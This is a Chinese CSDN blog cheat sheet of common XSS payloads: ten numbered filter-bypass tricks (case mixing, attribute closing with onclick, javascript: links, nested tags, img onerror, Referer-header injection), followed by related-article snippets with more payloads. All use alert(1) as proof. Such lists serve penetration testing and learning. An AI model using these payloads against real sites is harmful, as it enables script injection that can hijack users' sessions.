xss|常见payload

最新推荐文章于 2024-03-06 10:00:59 发布
最新推荐文章于 2024-03-06 10:00:59 发布
阅读量457 收藏
点赞数
文章标签: xss javascript web安全 html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_26347097/article/details/129738976
版权

1.普通的双写绕过

<ScRipt>alert(1)</ScRipt>
1"><ScRipt>alert(1)</ScRipt>


2.绕过htmlspecialchars方法,先闭合输入,再使用事件来绕过


' onclick ='javascript:alert(1)'//
" onclick ='javascript:alert(1)'//

3.<> script onclick被过滤,用a标签绕过


"></input><a href='javascript:alert(1)'>asd</a>//

4.重写绕过


1"><ScscriptRipt>alert(1)</ScscriptRipt>

5.Unicode编码绕过


javascript:alert(1)

6.使用type=text来显示被隐藏的标签,再用事件


&t_sort=" type='text' οnclick='javascript:alert(1)'>//

7.referer UserAgent Cookie等地方也可以进行xss测试


referer:" type='text' οnclick='javascript:alert(1)'>//

8.图片

<img src=xxxx οnerrοr=alert(1)>'

9.用这些字符来测试哪些被过滤了


“ ‘ <> script onerror  onclick


10.空格用回车编码代替


<a%0D%0Aοnclick='alert(1)'>
 

神毓逍遥-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
xss常见payload脚本
09-01
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
XSS payload (大集合)
m0_51186260的博客
10-18 2846
<script>alert(/xss/)</script> <script>alert(&#38;XSS&#38;)</script> <script>alert(&quot;XSS&quot;)</script>(代替被转义的“”) <INPUT type="text"value='\'><SCRIPT>alert(String.fromCharCode(88,83,83))&l
XSSpayload 常用构造和变形方法
最新发布
吉吉的博客
03-06 895
XSS 相关 payload 构造和变形的常用方法。
xss常用Payload总结
热门推荐
csd_ct的专栏
01-03 1万+
xss常用Payload总结 渗透测试时,常遇到页面输入框、留言板等输入交互点,大多是xss漏洞易出现的常见场景之一,记录几种常用的xss注入的姿势 1.img 注入 快速探测是否存在xss 1) <img src='x' onerror='alert(1)'> 2) <img src='x' onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))"> 2.iframe 注入 后台做了相
XSS常用Payload
z2560088的博客
01-11 9743
1.普通的 <ScRipt>alert(1)</ScRipt> 1"><ScRipt>alert(1)</ScRipt>2.绕过htmlspecialchars方法,先闭合输入,再使用事件来绕过 ' onclick ='javascript:alert(1)'// " onclick ='javascript:alert(1)'// 3.<> script onclick被过滤,用a标签绕过 "></input><
XSS payload大全
01-22
总结的XSSpayload,可以直接使用,直接进行攻击,各种payload
xss的各种payload脚本
08-12
xss 各种绕waf脚本语句
XSS测试payload
09-19
XSS测试payload,收集了简单的XSS测试用例,较具有实用性。
xss payload下载
04-03
多达5500多条xss payload提供下载,方便渗透测试人员更好地fuzz目标站点,检测xss漏洞是否存在
XSS与靶场(史上最详细附带payload)
qq_34598847的博客
10-17 1569
Cookie 和 Session都是用来跟踪浏览器用户身份的会话方式,但是两者的应用场景不太一样。Cookie 一般用来保存用户信息 比如①我们在 Cookie 中保存已经登录过得用户信息,下次访问网站的时候页面可以自动帮你填写登录的一些基本信息;②一般的网站都会有保持登录也就是说下次你再访问网站的时候就不需要重新登录了,这是因为用户登录的时候我们可以存放了一个 Token 在 Cookie 中,下次登录的时候只需要根据 Token 值来查找用户即可(为了安全考虑,重新登录一般要将 Token 重写)
XSS|跨站脚本攻击payload集合
qq_60115503的博客
05-09 3764
跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 常见的输出函数有: echo printf print print_r sprintf die var-dump var_export. #Alert Payload <s
XSS payload 大全
08-01 2022
收集的一些XSS payload,主要分为五大类,便于查阅。 #第一类:Javascript URL &lt;a href="javascript:alert('test')"&gt;link&lt;/a&gt; &lt;a href="java&amp;#115;cript:alert('xss')"&gt;link&lt;/a&gt; &lt;a href='vbscript:Ms
28、XSS常见payload
weixin_41489908的博客
01-02 5451
环境:http://xss-quiz.int21h.jp 一、Stage #1 无过滤xss漏洞 1、随便输入字符:123 2、输入payload: 3、弹出对话框,说明存在xss漏洞 二、Stage #2 属性中的xss漏洞 1、在窗口中输入payload:,查看审查元素,payload被写在一个标签中 2、重新构造payload,先闭合标签: "> 或者 "οnmοuseοve...
XSS-Payload大全
gy1bubble的博客
10-11 1300
<body oninput=javascript:alert(1)><input autofocus> <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKM.
终极万能XSS Payload
None安全团队
03-10 5972
前言: 在进行跨站脚本攻击的时候(xss),通常会需要我们通过插入的代码场景构造payload。就比较耗费时间,为了更方便的去测试漏洞,万能XSS payload就出现了 什么是万能XSS payload: 这里对它的定义就是 可以适应各种场景进行js代码执行的 payload,只需要有这一条payload即可(例如闭合html 闭合js) 下面我们来看看 payload长什么样子: jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=al...
XSS bypass思路及payload
Yty_819109的博客
05-30 557
xss bypass姿势
Pikachu(皮卡丘靶场)初识XSS常见标签事件及payload总结)
Welcome To Myon'Blog !
11-14 1662
XSS又叫跨站脚本攻击,是HTML代码注入,通过对网页注入浏览器可执行代码,从而实现攻击。​。domxss 的函数从具有 id 为 "text" 的元素中获取输入值,然后将其作为链接的 href 属性值插入到具有 id 为 "dom" 的元素的 innerHTML 中。尝试它给的payload:'>通过在链接的 href 属性中闭合单引号,然后插入一个图片元素,该元素的 onmouseover 事件触发一个弹窗,显
【网络安全---XSS漏洞(1)】XSS漏洞原理,产生原因,以及XSS漏洞的分类。附带案例和payload让你快速学习XSS漏洞
m0_67844671的博客
10-04 3206
一篇文章告诉xss是什么?原理,产生原因,分类以及一些案例
XSS注入payload
05-10
XSS(跨站脚本攻击)注入的payload可以有很多种形式,下面列举几个常见payload形式: 1. `<script>alert('XSS')</script>`:这是最简单的XSS payload,它会在页面中弹出一个警告框,显示“XSS”字样。 2. `...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

神毓逍遥-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值